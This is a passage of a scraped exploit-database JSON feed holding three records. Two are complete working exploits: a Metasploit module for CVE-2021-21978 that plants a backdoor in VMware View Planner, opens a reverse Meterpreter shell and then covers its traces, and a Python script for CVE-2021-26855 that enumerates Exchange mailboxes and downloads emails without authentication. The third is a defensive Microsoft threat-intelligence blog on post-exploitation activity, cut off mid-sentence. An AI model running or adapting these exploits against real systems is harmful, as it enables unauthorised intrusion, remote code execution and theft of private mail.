https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'VMware View Planner Unauthenticated Log File Upload RCE',\n 'Description' => %q{\n This module exploits an unauthenticated log file upload within the\n log_upload_wsgi.py file of VMWare View Planner 4.6 prior to 4.6\n Security Patch 1.\n\n Successful exploitation will result in RCE as the apache user inside\n the appacheServer Docker container.\n },\n 'Author' => [\n 'Mikhail Klyuchnikov', # Discovery\n 'wvu', # Analysis and PoC\n 'Grant Willcox' # Metasploit Module\n ],\n 'References' => [\n ['CVE', '2021-21978'],\n ['URL', 'https://www.vmware.com/security/advisories/VMSA-2021-0003.html'],\n ['URL', 'https://attackerkb.com/assessments/fc456e03-adf5-409a-955a-8a4fb7e79ece'] # wvu's PoC\n ],\n 'DisclosureDate' => '2021-03-02', # Vendor advisory\n 'License' => MSF_LICENSE,\n 'Privileged' => false,\n 'Platform' => 'python',\n 'Targets' => [\n [\n 'VMware View Planner 4.6.0',\n {\n 'Arch' => ARCH_PYTHON,\n 'Type' => :linux_command,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'python/meterpreter/reverse_tcp'\n }\n }\n ],\n ],\n 'DefaultTarget' => 0,\n 'DefaultOptions' => {\n 'SSL' => true\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n }\n )\n )\n\n register_options([\n Opt::RPORT(443),\n OptString.new('TARGETURI', [true, 'Base path', '/'])\n ])\n end\n\n def check\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, 'wsgi_log_upload', 'log_upload_wsgi.py')\n )\n\n unless res\n return CheckCode::Unknown('Target did not respond to check.')\n end\n\n unless res.code == 200 && !res.body.empty?\n return CheckCode::Safe('log_upload_wsgi.py file not found at the expected location.')\n end\n\n @original_content = res.body # If the server responded with the contents of log_upload_wsgi.py, lets save this for later restoration.\n\n if res.body&.include?('import hashlib') && res.body&.include?('if hashlib.sha256(password.value.encode(\"utf8\")).hexdigest()==secret_key:')\n return CheckCode::Safe(\"Target's log_upload_wsgi.py file has been patched.\")\n end\n\n CheckCode::Appears('Vulnerable log_upload_wsgi.py file identified!')\n end\n\n # We need to upload a file twice: once for uploading the backdoor, and once for restoring the original file.\n # As the code for both is the same, minus the content of the file, this is a generic function to handle that.\n def upload_file(content)\n mime = Rex::MIME::Message.new\n mime.add_part(content, 'application/octet-stream', nil, \"form-data; name=\\\"logfile\\\"; filename=\\\"#{Rex::Text.rand_text_alpha(20)}\\\"\")\n mime.add_part('{\"itrLogPath\":\"/etc/httpd/html/wsgi_log_upload\",\"logFileType\":\"log_upload_wsgi.py\"}', nil, nil, 'form-data; name=\"logMetaData\"')\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, 'logupload'),\n 'ctype' => \"multipart/form-data; boundary=#{mime.bound}\",\n 'data' => mime.to_s\n )\n unless res.to_s.include?('File uploaded successfully.')\n fail_with(Failure::UnexpectedReply, \"Target indicated that the file wasn't uploaded successfully!\")\n end\n end\n\n def exploit\n # Here we want to grab our template file, taken from a clean install but\n # with a backdoor section added to it, and then fill in the PAYLOAD placeholder\n # with the payload we want to execute.\n data_dir = File.join(Msf::Config.data_directory, 'exploits', shortname)\n file_content = File.read(File.join(data_dir, 'log_upload_wsgi.py'))\n\n payload.encoded.gsub!(/\"/, '\\\\\"')\n file_content['PAYLOAD'] = payload.encoded\n\n # Now that things are primed, upload the file to the target.\n print_status('Uploading backdoor to system via the arbitrary file upload vulnerability!')\n upload_file(file_content)\n print_good('Backdoor uploaded!')\n\n # Use the OPTIONS request to trigger the backdoor. Technically this\n # could be any other method including invalid ones like BACKDOOR, but for\n # the purposes of stealth lets use a legitimate one.\n print_status('Sending request to execute the backdoor!')\n send_request_cgi(\n 'method' => 'OPTIONS',\n 'uri' => normalize_uri(target_uri.path, 'logupload')\n )\n ensure\n # At this point we should have our shell after waiting a few seconds,\n # so lets now restore the original file so we don't leave anything behind.\n print_status('Reuploading the original code to remove the backdoor!')\n upload_file(@original_content)\n print_good('Original file restored, enjoy the shell!')\n end\nend\n", "sourceHref": "https://0day.today/exploit/35998", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-11-08T14:23:56", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-05-18T00:00:00", "type": "zdt", "title": "Microsoft Exchange 2019 - Unauthenticated Email Download Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855"], "modified": "2021-05-18T00:00:00", "id": "1337DAY-ID-36262", "href": "https://0day.today/exploit/description/36262", "sourceData": "# Exploit Title: Microsoft Exchange 2019 - Unauthenticated Email Download\n# Exploit Author: Gonzalo Villegas a.k.a Cl34r\n# Vendor Homepage: https://www.microsoft.com/\n# Version: OWA Exchange 2013 - 2019\n# Tested on: OWA 2016\n# CVE : CVE-2021-26855\n# Details: checking users mailboxes and automated downloads of emails\n\nimport requests\nimport argparse\nimport time\n\nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning\nrequests.packages.urllib3.disable_warnings(InsecureRequestWarning)\n\n__proxies__ = {\"http\": \"http://127.0.0.1:8080\",\n \"https\": \"https://127.0.0.1:8080\"} # for debug on proxy\n\n\n# needs to specifies mailbox, will return folder Id if account exists\npayload_get_folder_id = \"\"\"<?xml version=\"1.0\" encoding=\"utf-8\"?>\n <soap:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" \n xmlns:m=\"http://schemas.microsoft.com/exchange/services/2006/messages\" \n xmlns:t=\"http://schemas.microsoft.com/exchange/services/2006/types\" \n xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\">\n <soap:Body>\n <m:GetFolder>\n <m:FolderShape>\n <t:BaseShape>AllProperties</t:BaseShape>\n </m:FolderShape>\n <m:FolderIds>\n <t:DistinguishedFolderId Id=\"inbox\">\n <t:Mailbox>\n <t:EmailAddress>{}</t:EmailAddress>\n </t:Mailbox>\n </t:DistinguishedFolderId>\n </m:FolderIds>\n </m:GetFolder>\n </soap:Body>\n </soap:Envelope>\n\n\"\"\"\n# needs to specifies Folder Id and ChangeKey, will return a list of messages Ids (emails)\npayload_get_items_id_folder = \"\"\"<?xml version=\"1.0\" encoding=\"utf-8\"?>\n <soap:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" \n xmlns:m=\"http://schemas.microsoft.com/exchange/services/2006/messages\" \n xmlns:t=\"http://schemas.microsoft.com/exchange/services/2006/types\" \n xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\">\n <soap:Body>\n <m:FindItem Traversal=\"Shallow\">\n <m:ItemShape>\n <BaseShape>AllProperties</BaseShape></m:ItemShape>\n <SortOrder/>\n <m:ParentFolderIds>\n <t:FolderId Id=\"{}\" ChangeKey=\"{}\"/>\n </m:ParentFolderIds>\n <QueryString/>\n </m:FindItem>\n </soap:Body>\n</soap:Envelope>\n\"\"\"\n\n# needs to specifies Id (message Id) and ChangeKey (of message too), will return an email from mailbox\npayload_get_mail = \"\"\"<?xml version=\"1.0\" encoding=\"utf-8\"?>\n <soap:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" \n xmlns:m=\"http://schemas.microsoft.com/exchange/services/2006/messages\" \n xmlns:t=\"http://schemas.microsoft.com/exchange/services/2006/types\" \n xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\">\n <soap:Body>\n <GetItem xmlns=\"http://schemas.microsoft.com/exchange/services/2006/messages\" \n xmlns:t=\"http://schemas.microsoft.com/exchange/services/2006/types\" Traversal=\"Shallow\">\n <ItemShape>\n <t:BaseShape>Default</t:BaseShape>\n </ItemShape>\n <ItemIds>\n <t:ItemId Id=\"{}\" ChangeKey=\"{}\"/>\n </ItemIds>\n </GetItem>\n </soap:Body>\n </soap:Envelope>\n\"\"\"\n\n\ndef getFQDN(url):\n print(\"[*] Getting FQDN from headers\")\n rs = requests.post(url + \"/owa/auth.owa\", verify=False, data=\"evildata\")\n if \"X-FEServer\" in rs.headers:\n return rs.headers[\"X-FEServer\"]\n else:\n print(\"[-] Can't get FQDN \")\n exit(0)\n\n\ndef extractEmail(url, uri, user, fqdn, content_folderid, path):\n headers = {\"Cookie\": \"X-BEResource={}/EWS/Exchange.asmx?a=~1942062522\".format(fqdn),\n \"Content-Type\": \"text/xml\",\n \"User-Agent\": \"Mozilla pwner\"}\n from xml.etree import ElementTree as ET\n dom = ET.fromstring(content_folderid)\n for p in dom.findall('.//{http://schemas.microsoft.com/exchange/services/2006/types}Folder'):\n id_folder = p[0].attrib.get(\"Id\")\n change_key_folder = p[0].attrib.get(\"ChangeKey\")\n data = payload_get_items_id_folder.format(id_folder, change_key_folder)\n random_uris = [\"auth.js\", \"favicon.ico\", \"ssq.js\", \"ey37sj.js\"]\n rs = requests.post(url + uri, data=data, headers=headers, verify=False)\n if \"ErrorAccessDenied\" in rs.text:\n print(\"[*] Denied ;(.. retrying\")\n t_uri = uri.split(\"/\")[-1]\n for ru in random_uris:\n print(\"[*] Retrying with {}\".format(uri.replace(t_uri, ru)))\n rs = requests.post(url + uri.replace(t_uri, ru), data=data, headers=headers, verify=False)\n if \"NoError\" in rs.text:\n print(\"[+] data found, dowloading email\")\n break\n print(\"[+]Getting mails...\")\n dom_messages = ET.fromstring(rs.text)\n messages = dom_messages.find('.//{http://schemas.microsoft.com/exchange/services/2006/types}Items')\n for m in messages:\n id_message = m[0].attrib.get(\"Id\")\n change_key_message = m[0].attrib.get(\"ChangeKey\")\n data = payload_get_mail.format(id_message, change_key_message)\n random_uris = [\"auth.js\", \"favicon.ico\", \"ssq.js\", \"ey37sj.js\"]\n rs = requests.post(url + uri, data=data, headers=headers, verify=False)\n if \"ErrorAccessDenied\" in rs.text:\n print(\"[*] Denied ;(.. retrying\")\n t_uri = uri.split(\"/\")[-1]\n for ru in random_uris:\n print(\"[*] Retrying with {}\".format(uri.replace(t_uri, ru)))\n rs = requests.post(url + uri.replace(t_uri, ru), data=data, headers=headers, verify=False)\n if \"NoError\" in rs.text:\n print(\"[+] data found, downloading email\")\n break\n\n try:\n f = open(path + \"/\" + user.replace(\"@\", \"_\").replace(\".\", \"_\")+\"_\"+change_key_message.replace(\"/\", \"\").replace(\"\\\\\", \"\")+\".xml\", 'w+')\n f.write(rs.text)\n f.close()\n except Exception as e:\n print(\"[!] Can't write .xml file to path (email): \", e)\n\n\ndef checkURI(url, fqdn):\n headers = {\"Cookie\": \"X-BEResource={}/EWS/Exchange.asmx?a=~1942062522\".format(fqdn),\n \"Content-Type\": \"text/xml\",\n \"User-Agent\": \"Mozilla hehe\"}\n arr_uri = [\"//ecp/xxx.js\", \"/ecp/favicon.ico\", \"/ecp/auth.js\"]\n for uri in arr_uri:\n rs = requests.post(url + uri, verify=False, data=payload_get_folder_id.format(\"[email\u00a0protected]\"),\n headers=headers)\n #print(rs.content)\n if rs.status_code == 200 and \"MessageText\" in rs.text:\n print(\"[+] Valid URI:\", uri)\n calculated_domain = rs.headers[\"X-CalculatedBETarget\"].split(\".\")\n if calculated_domain[-2] in (\"com\", \"gov\", \"gob\", \"edu\", \"org\"):\n calculated_domain = calculated_domain[-3] + \".\" + calculated_domain[-2] + \".\" + calculated_domain[-1]\n else:\n calculated_domain = calculated_domain[-2] + \".\" + calculated_domain[-1]\n return uri, calculated_domain\n #time.sleep(1)\n print(\"[-] No valid URI found ;(\")\n exit(0)\n\n\ndef checkEmailBoxes(url, uri, user, fqdn, path):\n headers = {\"Cookie\": \"X-BEResource={}/EWS/Exchange.asmx?a=~1942062522\".format(fqdn),\n \"Content-Type\": \"text/xml\",\n \"User-Agent\": \"Mozilla hehe\"}\n rs = requests.post(url + uri, verify=False, data=payload_get_folder_id.format(user),\n headers=headers)\n #time.sleep(1)\n #print(rs.content)\n if \"ResponseCode\" in rs.text and \"ErrorAccessDenied\" in rs.text:\n print(\"[*] Valid Email: {} ...but not authenticated ;( maybe not vulnerable\".format(user))\n if \"ResponseCode\" in rs.text and \"NoError\" in rs.text:\n print(\"[+] Valid Email Found!: {}\".format(user))\n extractEmail(url, uri, user, fqdn, rs.text, path)\n if \"ResponseCode\" in rs.text and \"ErrorNonExistentMailbox\" in rs.text:\n print(\"[-] Not Valid Email: {}\".format(user))\n\n\ndef main():\n __URL__ = None\n __FQDN__ = None\n __mailbox_domain__ = None\n __path__ = None\n print(\"[***** OhhWAA *****]\")\n parser = argparse.ArgumentParser(usage=\"Basic usage python %(prog)s -u <url> -l <users.txt> -p <path>\")\n parser.add_argument('-u', \"--url\", help=\"Url, provide schema and not final / (eg https://example.org)\", required=True)\n parser.add_argument('-l', \"--list\", help=\"Users mailbox list\", required=True)\n parser.add_argument(\"-p\", \"--path\", help=\"Path to write emails in xml format\", required=True)\n parser.add_argument('-f', \"--fqdn\", help=\"FQDN\", required=False, default=None)\n parser.add_argument(\"-d\", \"--domain\", help=\"Domain to check mailboxes (eg if .local dont work)\", required=False, default=None)\n args = parser.parse_args()\n __URL__ = args.url\n __FQDN__ = args.fqdn\n __mailbox_domain__ = args.domain\n __list_users__ = args.list\n __valid_users__ = []\n __path__ = args.path\n if not __FQDN__:\n __FQDN__ = getFQDN(__URL__)\n print(\"[+] Got FQDN:\", __FQDN__)\n\n valid_uri, calculated_domain = checkURI(__URL__, __FQDN__)\n\n if not __mailbox_domain__:\n __mailbox_domain__ = calculated_domain\n\n list_users = open(__list_users__, \"r\")\n for user in list_users:\n checkEmailBoxes(__URL__, valid_uri, user.strip()+\"@\"+__mailbox_domain__, __FQDN__, __path__)\n\n print(\"[!!!] FINISHED OhhWAA\")\n\n\nif __name__ == '__main__':\n main()\n", "sourceHref": "https://0day.today/exploit/36262", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "mssecure": [{"lastseen": "2021-03-26T05:16:59", "description": "Microsoft continues to monitor and investigate attacks exploiting the recent on-premises Exchange Server vulnerabilities. These attacks are now performed by multiple threat actors ranging from financially motivated cybercriminals to state-sponsored groups. To help customers who are not able to immediately install updates, Microsoft [released a one-click tool](<https://msrc-blog.microsoft.com/2021/03/15/one-click-microsoft-exchange-on-premises-mitigation-tool-march-2021/>) that automatically mitigates one of the vulnerabilities and scans servers for known attacks. Microsoft also [built this capability into Microsoft Defender Antivirus](<https://www.microsoft.com/security/blog/2021/03/18/automatic-on-premises-exchange-server-mitigation-now-in-microsoft-defender-antivirus/>), expanding the reach of the mitigation. As of today, we have seen a significant decrease in the number of still-vulnerable servers \u2013 more than 92% of known worldwide Exchange IPs are now patched or mitigated. We continue to work with our customers and partners to mitigate the vulnerabilities.\n\nAs organizations recover from this incident, we continue to publish guidance and share threat intelligence to help detect and evict threat actors from affected environments. Today, we are sharing intelligence about what some attackers did after exploiting the vulnerable servers, ranging from ransomware to data exfiltration and deployment of various second-stage payloads. This blog covers:\n\n * Threat intelligence and technical details about known attacks, including components and attack paths, that defenders can use to investigate whether on-premises Exchange servers were compromised before they were patched and to comprehensively respond to and remediate these threats if they see them in their environments.\n * Detection and automatic remediation built into Microsoft Defender Antivirus and how investigation and remediation capabilities in solutions like Microsoft Defender for Endpoint can help responders perform additional hunting and remediate threats.\n\nAlthough the overall numbers of ransomware have remained extremely small to this point, it is important to remember that these threats show how quickly attackers can pivot their campaigns to take advantage of newly disclosed vulnerabilities and target unpatched systems, demonstrating how critical it is for organizations to apply security updates as soon as possible. We strongly urge organizations to identify and update vulnerable on-premises Exchange servers, and to follow mitigation and investigation guidance that we have collected and continue to update here: <https://aka.ms/ExchangeVulns>.\n\n## Mitigating post-exploitation activities\n\nThe first known attacks leveraging the Exchange Server vulnerabilities were by the nation-state actor HAFNIUM, which we detailed in [this blog](<https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>). In the three weeks after the Exchange server vulnerabilities were disclosed and the security updates were released, Microsoft saw numerous other attackers adopting the exploit into their toolkits. Attackers are known to rapidly work to reverse engineer patches and develop exploits. In the case of a remote code execution (RCE) vulnerability, the rewards are high for attackers who can gain access before an organization patches, as patching a system does not necessarily remove the access of the attacker.\n\n\n\n_Figure 1. The Exchange Server exploit chain_\n\nIn our investigation of the on-premises Exchange Server attacks , we saw systems being affected by multiple threats. **Many of the compromised systems have not yet received a secondary action**, such as human-operated ransomware attacks or data exfiltration, indicating attackers could be establishing and keeping their access for potential later actions. These actions might involve performing follow-on attacks via persistence on Exchange servers they have already compromised, or using credentials and data stolen during these attacks to compromise networks through other entry vectors.\n\nAttackers who included the exploit in their toolkits, whether through modifying public proof of concept exploits or their own research, capitalized on their window of opportunity to gain access to as many systems as they could. Some attackers were advanced enough to remove other attackers from the systems and use multiple persistence points to maintain access to a network.\n\nWe have built protections against these threats into Microsoft security solutions. Refer to the Appendix for a list of indicators of compromise, detection details, and advanced hunting queries. We have also provided additional tools and investigation and remediation guidance here: <https://aka.ms/exchange-customer-guidance>.\n\nWhile performing a full investigation on systems is recommended, the following themes are common in many of the attacks. These are prevailing threat trends that Microsoft has been monitoring, and existing solutions and recommendations for prevention and mitigation apply:\n\n * Web shells - As of this writing, many of the unpatched systems we observed had multiple web shells on them. Microsoft has been tracking the rise of web shell attacks for the past few years, ensuring our products detect these threats and providing remediation guidance for customers. For more info on web shells, read [Web shell attacks continue to rise](<https://www.microsoft.com/security/blog/2021/02/11/web-shell-attacks-continue-to-rise/>). We have also published guidance on [web shell threat hunting with Azure Sentinel](<http://aka.ms/exchange-web-shell-investigation>).\n * Human-operated ransomware - Ransomware attacks pose some of the biggest security risks for organizations today, and attackers behind these attacks were quick to take advantage of the on-premises Exchange Server vulnerabilities. Successfully exploiting the vulnerabilities gives attackers the ability to launch human-operated ransomware campaigns, a trend that Microsoft has been closely monitoring. For more information about human-operated ransomware attacks, including Microsoft solutions and guidance for improving defenses, read: [Human-operated ransomware attacks](<https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/>).\n * Credential theft \u2013 While credential theft is not the immediate goal of some of these attacks, access to Exchange servers allowed attackers to access and potentially steal credentials present on the system. Attackers can use these stolen credentials for follow-on attacks later, so organizations need to prioritize identifying and remediating impacted identities. For more information, read best practices for building credential hygiene.\n\nIn the following sections, we share our analysis of known post-compromise activities associated with exploitation of the Exchange server vulnerabilities because it is helpful to understand these TTPs, in order to defend against other actors using similar tactics or tools. While levels of disruptive post-compromise activity like ransomware may be limited at the time of this writing, Microsoft will continue to track this space and share information with the community. It\u2019s important to note that with some post-compromise techniques, attackers may gain highly privileged persistent access, but **many of the impactful subsequent attacker activities can be mitigated by practicing the principle of least privilege and mitigating lateral movement**.\n\n## DoejoCrypt ransomware\n\nDoejoCrypt was the first ransomware to appear to take advantage of the vulnerabilities, starting to encrypt in limited numbers shortly after the patches were released. Ransomware attackers often use multiple tools and exploits to gain initial access, including purchasing access through a broker or \u201creseller\u201d who sells access to systems they have already compromised. The DoejoCrypt attacks start with a variant of the Chopper web shell being deployed to the Exchange server post-exploitation.\n\nThe web shell writes a batch file to _C:\\Windows\\Temp\\xx.bat_. Found on all systems that received the DoejoCrypt ransomware payload, this batch file performs a backup of the Security Account Manager (SAM) database and the System and Security registry hives, allowing the attackers later access to passwords of local users on the system and, more critically, in the LSA Secrets portion of the registry, where passwords for services and scheduled tasks are stored.\n\n\n\n_Figure 2. xx.bat_\n\nGiven configurations that administrators typically use on Exchange servers, many of the compromised systems are likely to have had at least one service or scheduled task configured with a highly privileged account to perform actions like backups. **As service account credentials are not frequently changed, this could provide a great advantage to an attacker even if they lose their initial web shell access due to an antivirus detection**, as the account can be used to elevate privileges later, which is why we strongly recommend operating under the principle of least privileged access.\n\nThe batch file saves the registry hives to a semi-unique location, _C:\\windows\\temp\\debugsms_, assembles them into a CAB file for exfiltration, and then cleans up the folders from the system. The file also enables Windows Remote Management and sets up an HTTP listener, indicating the attacker might take advantage of the internet-facing nature of an Exchange Server and use this method for later access if other tools are removed.\n\n\n\n_Figure 3. xx.bat actions_\n\nThe _xx.bat_ file has been run on many more systems than have been ransomed by the DoejoCrypt attacker, meaning that, while not all systems have moved to the ransom stage, the attacker has gained access to multiple credentials. On systems where the attacker moved to the ransom stage, we saw reconnaissance commands being run via the same web shell that dopped the xx.bat file (in this instance, a version of Chopper):\n\n\n\n_Figure 4. DoejoCrypt recon command_\n\nAfter these commands are completed, the web shell drops a new payload to _C:\\Windows\\Help_ which, like in many human-operated ransomware campaigns, leads to the attack framework Cobalt Strike. In observed instances, the downloaded payload is shellcode with the file name _new443.exe_ or _Direct_Load.exe_. When run, this payload injects itself into _notepad.exe_ and reaches out to a C2 to download Cobalt Strike shellcode.\n\n\n\n_Figure 5. DoejoCrypt ransomware attack chain_\n\nDuring the hands-on-keyboard stage of the attack, a new payload is downloaded to _C:\\Windows\\Help_ with names like _s1.exe_ and _s2.exe_. This payload is the DoejoCrypt ransomware, which uses a _.CRYPT_ extension for the newly encrypted files and a very basic _readme.txt_ ransom note. In some instances, the time between _xx.bat_ being dropped and a ransomware payload running was under half an hour.\n\n\n\n_Figure 6. DoejoCrypt ransom note_\n\nWhile the DoejoCrypt payload is the most visible outcome of the attackers\u2019 actions, the access to credentials they have gained could serve them for future campaigns if organizations do not reset credentials on compromised systems. An additional overlapping activity observed on systems where _xx.bat_ was present and the attackers were able to get Domain Administrator rights was the running of scripts to snapshot Active Directory with _ntdsutil_\u2014an action that, if executed successfully, could give the attackers access to all the passwords in Active Directory from a single compromised system.\n\n## Lemon Duck botnet\n\nCryptocurrency miners were some of the first payloads we observed being dropped by attackers from the post-exploit web shells. In the first few days after the security updates were released, we observed multiple cryptocurrency miner campaigns, which had been previously targeting SharePoint servers, add Exchange Server exploitation to their repertoire. Most of these coin miners were variations on XMRig miners, and many arrived via a multi-featured implant with the capability to download new payloads or even move laterally.\n\nLemon Duck, a known cryptocurrency botnet named for a variable in its code, dove into the Exchange exploit action, adopting different exploit styles and choosing to use a fileless/web shell-less option of direct PowerShell commands from w3wp (the IIS worker process) for some attacks. While still maintaining their normal email-based campaigns, the Lemon Duck operators compromised numerous Exchange servers and moved in the direction of being more of a malware loader than a simple miner.\n\nUsing a form of the attack that allows direct execution of commands versus dropping a web shell, the Lemon Duck operators ran standard Invoke Expression commands to download a payload. Having used the same C2 and download servers for some time, the operators applied a varied degree of obfuscation to their commands on execution.\n\n\n\n_Fig 7. Example executions of Lemon Duck payload downloads_\n\nThe Lemon Duck payload is an encoded and obfuscated PowerShell script. It first removes various security products from the system, then creates scheduled tasks and WMI Event subscription for persistence. A second script is downloaded to attempt to evade Microsoft Defender Antivirus, abusing their administrative access to run the _Set-MPPreference_ command to disable real-time monitoring (a tactic that Microsoft Defender [Tamper protection](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-antivirus/prevent-changes-to-security-settings-with-tamper-protection>) blocks) and add scanning exclusions for the C:\\ drive and the PowerShell process.\n\n\n\n\n\n_Figure 8. Lemon Duck payloads_\n\nOne randomly named scheduled task connects to a C2 every hour to download a new payload, which includes various lateral movement and credential theft tools. The operators were seen to download RATs and information stealers, including [Ramnit](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Win32/Ramnit>) payloads.\n\n\n\n_Figure 9. Lemon Duck post-exploitation activities_\n\nIn some instances, the operators took advantage of having compromised mail servers to access mailboxes and send emails containing the Lemon Duck payload using various colorful email subjects.\n\n\n\n_Figure 10. Email subjects of possibly malicious emails_\n\n\n\n_Figure 11. Attachment variables_\n\nIn one notable example, the Lemon Duck operators compromised a system that already had _xx.bat_ and a web shell. After establishing persistence on the system in a non-web shell method, the Lemon Duck operators were observed cleaning up other attackers\u2019 presence on the system and mitigating the CVE-2021-26855 (SSRF) vulnerability using a legitimate cleanup script that they hosted on their own malicious server. This action prevents further exploitation of the server and removes web shells, giving Lemon Duck exclusive access to the compromised server. This stresses the need to fully investigate systems that were exposed, even if they have been fully patched and mitigated, per traditional incident response process.\n\n## Pydomer ransomware\n\nWhile DoejoCrypt was a new ransomware payload, the access gained by attackers via the on-premises Exchange Server vulnerabilities will likely become part of the complex cybercriminal economy where additional ransomware operators and affiliates take advantage of it. The first existing ransomware family to capitalize on the vulnerabilities was Pydomer. This ransomware family was previously seen using vulnerabilities in attacks, notably taking advantage of Pulse Secure VPN vulnerabilities, for which Pulse Secure has released security patches, to steal credentials and perform ransomware attacks.\n\nIn this campaign, the operators scanned and mass-compromised unpatched Exchange Servers to drop a web shell. They started later than some other attackers, with many compromises occurring between March 18 and March 20, a window when fewer unpatched systems were available. They then dropped a web shell, with a notable file name format: \u201cChack[Word][Country abbreviation]\u201d:\n\n\n\n_Figure 12. Example web shell names observed being used by the Pydomer attackers_\n\nThese web shells were observed on around 1,500 systems, not all of which moved to the ransomware stage. The attackers then used their web shell to dump a _test.bat_ batch file that performed a similar function in the attack chain to the _xx.bat_ of the DoejoCrypt operators and allowed them to perform a dump of the LSASS process.\n\n\n\n_Figure 13. Pydomer post-exploitation activities_\n\nThis access alone would be valuable to attackers for later attacks, similar to the credentials gained during their use of Pulse Secure VPN vulnerabilities. The highly privileged credentials gained from an Exchange system are likely to contain domain administrator accounts and service accounts with backup privileges, meaning these attackers could perform ransomware and exfiltration actions against the networks they compromised long after the Exchange Server is patched and even enter via different means.\n\nOn systems where the attackers did move to second-stage ransomware operations, they utilized a Python script compiled to an executable and the Python cryptography libraries to encrypt files. The attackers then executed a PowerShell script via their web shell that acts as a downloader and distribution mechanism for the ransomware.\n\n\n\n_Figure 14. __PowerShell downloader and spreader used to get the Pydomer payload_\n\nThe script fetches a payload from a site hosted on a domain generation algorithm (DGA) domain, and attempts to spread the payload throughout the network, first attempting to spread the payload over WMI using Invoke-WMIMethod to attempt to connect to systems, and falling back to PowerShell remoting with Enter-PSSession if that fails. The script is run within the context of the web shell, which in most instances is Local System, so this lateral movement strategy is unlikely to work except in organizations that are running highly insecure and unrecommended configurations like having computer objects in highly privileged groups.\n\nThe Pydomer ransomware is a Python script compiled to an executable and uses the Python cryptography libraries to encrypt files. The ransomware encrypts the files and appends a random extension, and then drops a ransom note named _decrypt_file.TxT_.\n\n\n\n_Figure 15. Pydomer __ransom note_\n\nInterestingly, the attackers seem to have deployed a non-encryption extortion strategy. Following well-known ransomware groups like Maze and Egregor which leaked data for pay, the Pydomer hackers dropped an alternative _readme.txt_ onto systems without encrypting files. This option might have been semi-automated on their part or a side effect of a failure in their encryption process, as some of the systems they accessed were test systems that showed no data exfiltration. The note should be taken seriously if encountered, as the attackers had full access to systems and were likely able to exfiltrate data.\n\n\n\n_Figure 16. Pydomer extortion readme.txt_\n\n## Credential theft, turf wars, and dogged persistence\n\nIf a server is not running in a least-privilege configuration, credential theft could provide a significant return on investment for an attacker beyond their initial access to email and data. Many organizations have backup agent software and scheduled tasks running on these systems with domain admin-level permissions. For these organizations, the attackers might be able to harvest highly privileged credentials without lateral movement, for example, using the COM services DLL as a living-off-the-land binary to perform a dump of the LSASS process:\n\n\n\n_Figure 17.__ Use of COM services DLL to dump LSASS process_\n\nThe number of observed credential theft attacks, combined with high privilege of accounts often given to Exchange servers, means that these attacks could continue to impact organizations that don\u2019t fully remediate after a compromise even after patches have been applied. While the observed ransomware attempts were small-scale or had errors, there is still the possibility of [more skillful groups](<https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/>) utilizing credentials gained in these attacks for later attacks.\n\nAttackers also used their access to perform extensive reconnaissance using built-in Exchange commandlets and _dsquery_ to exfiltrate information about network configurations, user information, and email assets.\n\nWhile Lemon Duck operators might have had the boldest method for removing other attackers from the systems they compromised, they were not the only attacker to do so. Others were observed cleaning up .aspx and .bat files to remove other attackers, and even rebuilding the WMI database by deleting .mof files and restarting the service. As the window on unpatched machines closes, attackers showed increased interest in maintaining the access to the systems they exploited. By utilizing "malwareless" persistence mechanisms like enabling RDP, installing Shadow IT tools, and adding new local administrator accounts, the attackers are hoping to evade incident response efforts that might focus exclusively on web shells, AV scans, and patching.\n\n## Defending against exploits and post-compromise activities\n\nAttackers exploit the on-premises Exchange Server vulnerabilities in combination to bypass authentication and gain the ability to write files and run malicious code. The best and most complete remediation for these vulnerabilities is to update to a supported Cumulative Update and to install all security updates. Comprehensive mitigation guidance can be found here: <https://aka.ms/ExchangeVulns>.\n\nAs seen in the post-exploitation attacks discussed in this blog, the paths that attackers can take after 